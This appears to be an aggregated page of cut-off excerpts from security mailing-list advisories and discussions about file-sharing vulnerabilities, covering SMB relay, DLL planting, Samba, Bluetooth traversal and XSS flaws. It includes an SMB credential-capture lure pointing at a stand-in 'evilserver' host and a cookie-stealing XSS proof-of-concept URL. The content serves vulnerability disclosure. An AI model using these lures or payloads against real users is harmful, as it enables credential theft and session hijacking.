Next Page >>
sharing
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities
Advisory ID: cisco-sa-20111019-sns
Revision 1.0
For Public Release 2011 October 19 16:00 UTC (GMT)
> CPNI-957037[1]:
>
> The OpenSSH team has been made aware of an attack against the SSH
> protocol version 2 by researchers at the University of London.
> Unfortunately, due to the report lacking any detailed technical
> description of the attack and CPNI's unwillingness to share necessary
> information, we are unable to properly assess its impact.
It is really sad researchers are prevented to share details with
developers by some lame institute. The OpenSSH developers were asked to
undersign the document below. Apart from asking to be cited as the
(ii) An attacker A connects to system S and sends mutiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
web server with similar <IMG> tags. Upon receiving the connections from
system S,the attacker's SMB server will respond with the previously
obtained challenges and will store the corresponding responses returned
by the remote system. Attacker A has now a set of responses which are
the challenges encrypted with user's U credentials.
Hi Thor,
Thanks to Microsoft's "defense in depth," double-clicking an .exe from a remote share
pops up a security warning. In contrast, double-clicking a data file that opens a
vulnerable application (which downloads and executes a .dll from the same share)
doesn't trigger such security warning. You might argue that users don't care about
such warnings and you might be right.
On the upside (or downside, depending on one's role in this game), our researchers
have already found an attack vector for binary planting (a superset of dll hijacking)
Analysis
========
As a result of an incorrect dynamic link library loading in VMware Tools
for Windows, an attacker can cause her malicious DLL to be loaded and
executed from local drives, a remote Windows share, and even a share
located on Internet.
All a remote attacker has to do is plant a malicious DLL with a specific
name on a network share and get the user to open any file from this
network location with any Windows application - which should require
Vulnerabilities and Exposures project identifies the following problems:
The mount.cifs utility is missing proper checks for file permissions when
used in verbose mode. This allows local users to partly disclose the
content of arbitrary files by specifying the file as credentials file and
attempting to mount a samba share (CVE-2009-2948).
A reply to an oplock break notification which samba doesn't expect could
lead to the service getting stuck in an infinite loop. An attacker
can use this to perform denial of service attacks via a specially crafted
SMB request (CVE-2009-2906).
Description
_______________
OneNote is included as part of office 2007, and provides an easy
way to store, manage, and share information.
OneNote installs a URL Handler under the registry key
HKEY_CLASSES_ROOT\OneNote
with an open command specified as
path but arbitrary code.
The fix is to do what everybody with a directory traversal bug has to
do, block out of path relative directories. In this specific case,
prevent the creation of symlinks where the target is out of the SMB
share's range. (Still allow navigation to such symlinks if one exists,
though.)
On Feb 6, 2010, at 8:21 AM, "Stefan Kanthak" <stefan.kanthak@nexgo.de>
>Am Montag, den 25.10.2010, 22:56 +0000 schrieb Thor (Hammer of God):
>> The main point is that you've got to get people to not only connect up
>> to your remote share, but you've got to get them to execute the file,
>> etc. So I'm just wondering what makes this anything more than any
>> other "put a malicious link here to make the user execute it" or email
>> attachment business, particularly when you say "Remote Code
>> Execution."
>
>Err... as far as I know, the interesting part is having the current path be set to
>something you can control (to make windows load evil dlls), and if you just link
About:
Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
It is a fast, easy to use commercial, standalone "all-in-one" file-sharing web server.
Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories). Files can be shared anonymously, or via EFSWS's built-in user management. EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access). Users log in, and are presented with a menu of files that have been published and that are made available for download.
EFSWS uses the MGH Software "myDB" database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc. A free db parser is available at:
http://www.mghsoft.com/
Please see vendor site and db engine site for more details.
> (On a side note, you're not going to see this sort of symlink stuff on
> Windows,
What exactly do you mean?
Traversing symlinks on the server/share, or creation of "wide" symlinks
by the client on the server/share?
Since Windows 2000 NTFS supports "junctions", which pretty much resemble
Unix symlinks, but only for directories.
See <http://support.microsoft.com/kb/205524/en-us>
Changes were made to Skype to remove available command line arguments when
the /URI argument is present, and to resolve the discovered injection vulnerability.
Although many of the useful arguments have been disallowed, Security-Assessment.com
found that the /Datapath argument can be included and directed to a remote SMB
share directly through a specially crafted Skype URI.
The Datapath argument specifies the location of the Skype configuration files and
security policy. Specifying a Datapath argument will override any local security
policy defined in the Windows registry.
> (interesting ;););))?
>
> If so, should that mean that they implicitely recognize the very good
> work done by the community?
>
> If so, why not act politely with the community and share knowledge?
>
> This would make the software better, so that they could still use it in
> their applications.
>
> How can't they understand that?
+-----------+
|Description|
+-----------+
The Yoono Firefox extension provides an interface for
users to share objects with their friends on social
networks from any website. It allows users to select
images from a website to be shared, which publishes
that image to their friends.
Security-Assessment.com discovered that Yoono's share
It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2
A remote attacker can read, list and retrieve nearly all files on the System remotely.
Required is a valid samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share,
in this case this is a preauth exploit.
The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).
The public botnets@ mailing list, where malicious activity on the Internet
can be openly shared, has been revived, and boy is it active.
Warning: live samples and malicious URLs are openly shared there.
Mailing list URL:
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Reasons, thinking and explanations:
http://gadievron.blogspot.com/2008/08/public-sharing-and-new-statregy-in.html
Interested in Sponsoring??
Send a mail to dharmeshmm at mastek dot com or call at +91 98670 75327 to understand the sponsorship details.
Got MORE !! Ideas for the Event ??
Quickly write back to dharmeshmm at mastek dot com or call at +91 98670 75327 to share and make this a successful meet !!
Details at: http://www.owasp.org/index.php/Mumbai#Theme_:_Privacy_in_21st_Century
Please feel free to share this information to your colleagues to share and gain maximum information.
(interesting ;););))?
If so, should that mean that they implicitely recognize the very good
work done by the community?
If so, why not act politely with the community and share knowledge?
This would make the software better, so that they could still use it in
their applications.
How can't they understand that?
On Thu, Sep 15, 2011 at 7:11 PM, Michael Schmidt <mschmidt@drugstore.com> wrote:
> Someone’s just not reading the bulletins – Note the term “Remote” –
> including webdav, so a share that could be fully controlled by the
> exploiter. At least that is what I am understanding.
>
>
>
> Updates released on September 13, 2011
>
> Microsoft Security Bulletin MS11-071, "Vulnerability in Windows Components
About:
Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
It is a fast, easy to use commercial, standalone "all-in-one" file-sharing web server.
Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories). Files can be shared anonymously, or via EFSWS's built-in user management. EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access). Users log in, and are presented with a menu of files that have been published and that are made available for download.
EFSWS uses the MGH Software "myDB" database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc. A free db parser is available at:
http://www.mghsoft.com/
Please see vendor site and db engine site for more details.
explosion of colors.
Sensitivity, we could say, is what is left to a human being when she
has nothing anymore, and differenciates her from the body corporate or
the institution, that are, in essence, devoid of it. Therefore, Art
definitely remains the public space to share between humans, and only
between us. And if it the last one to share, we propose to explore it
and take it over during the upcoming edition of the Hacker Space
Festival, from the 26th to 30th of June, 2009 at Vitry sur Seine[9].
========================================================================
Google Docs (HTML code) Multiple Cross Site Scripting Vulnerabilities
I. Background:
Google Docs is an online application which makes possibile to "Create and share your work online". You can use it to
create Documents, Presentations, Spreadsheets and Forms.
II. Description:
Multiple cross site scripting vulnerabilities were identified in Google Docs. A remote attacker could write a malformed
document and invite, through Google Docs sharing option, other users to see it in order to obtain their cookies. It's also possible
References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/Microsoft-Bluetooth-Stack-Directory-Traversal.html
Description:
Most Windows Mobile 5.0 & 6 devices are shipped with Microsoft Bluetooth stack, only few of them use others like Widcomm Bluetooth stack. Among all the Bluetooth services that may be implemented in the stack, OBEX FTP is the most common service.
OBEX FTP Bluetooth service can be used to share files through Bluetooth, not only by sending files but also by allowing remote devices to browse local shared folders and download files. Usually, the service is configured in such a way that a specific directory is shared and the user can place there all the files he would like to share with other people. The default directory is My Device\My Documents\Bluetooth Share. A different directory may be selected by the user, however the Bluetooth wizard usually doesn't allow specifying any other from the filesystem out of My Device\My Documents\ or Memory Card\My Documents\ paths. This is because of safety reasons, so the user can't expose sensitive files or information through Bluetooth.
There exists a Directory Traversal vulnerability in the OBEX FTP Service in Microsoft Bluetooth Stack implemented in Windows Mobile 5.0 & 6 devices. A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP to traverse to parent directories out of the default Bluetooth shared folder. This means the attacker can browse folders located on a lower level, download files contained in those folders as well as upload files to those folders.
The only requirement is that the attacker must have authentication and authorization privileges over the OBEX FTP service. Pairing up with the remote Windows Mobile device should be enough to get it. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.
Through specially crafted TNEF streams with certain MAPI attachment
properties, it is possible to set a path name to files to be executed.
When a user double clicks on such an attachment or message, Outlook will
proceed to execute the file that is set by the path name value. These
files can be local files, but also file stored remotely for example on a
file share. Exploitation is limited by the fact that its is not
possible for attackers to supply command line options.
------------------------------------------------------------------------
See also
------------------------------------------------------------------------
Because of different filename handling in Posix and Windows there is
an issue with resolving filenames with a backslash "\" character
appended on a windows share.
Consider you have a windows share mounted on a linux box with a php
script on it - let's say info.php.
Executing find info.php and find info.php\\ results with the same file
- info.php (same with cat info.php\\).
When using this share to serve PHP scripts with apache (from a linux
box) you can use it to display php script content directly to your
used for the java.home value. It is not yet known whether or not UNC
paths may be used for java.ext.dirs.
During testing, VSR found that Java Cryptography Extension (JCE) classes
failed to load when java.home was set to an invalid path. However, by
setting this path to network share which hosted a valid JRE
installation, the JCE classes loaded correctly. If such a network share
were hosted by the attacker, then arbitrary code could potentially be
loaded without restrictions, unbeknownst to the victim.
The following XML shows what a malicious jnlp file might look like.
===========================================================================
1. BACKGROUND:
TwonkyMedia Server is a DLNA-compliant, UPnP AV-compliant software
that allows to share and stream media to hundreds of popular consumer
electronics devices. It is available for Windows, Linux, Macintosh and
for various different architectures.
TwonkyMedia Server is bundled on a variety of CE and NAS devices from
leading manufacturers, including: Buffalo LinkStation, HP Media Vault,
LaCie Ethernet Disk, Philips Streamium music players, Western Digital
>
> NO, Windows SMB server crosses reparse points!
Not in my testing, at least not for junctions and symlinks. User with
requisite authority could traverse the junctions and symlinks locally,
but not remotely via a share.
> But as Dan Kaminsky pointed out, you need to have administrative
rights
> to remotely create a junction on an SMB share, so the non-admin user
> cant get himself access to files outside a share he's allowed to
Proof of concept, version 4.0.4:
https://[yourserver]/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=XSS_%3Cbody%20onload=alert(document.cookie)%3E_here
Impact:
Attacker could impersonate victim to do any activity the victim is authorized to do through a compromised web site, for example, initiate funds transfers or access private data. Under some circumstances the existence of this vulnerability in one web site could be used to attack other web sites in the same DNS domain. For example, if host "a.example.com" shares cookies with host "b.example.com" and "b" is vulnerable, "b" can be used to attack "a".
Versions tested:
Calcium 4.0.4 Vulnerable
Calcium 3.10 Vulnerable
Analysis
========
As a result of an incorrect dynamic link library loading in Adobe Flash
Player for Windows, an attacker can cause her malicious DLL to be loaded
and executed from local drives, remote Windows shares, and even shares
located on Internet.
All a remote attacker has to do is plant a malicious DLL with a specific
name on a network share and get the user to open a specially crafted file
from this network location - which should require minimal social
Next Page>>
|
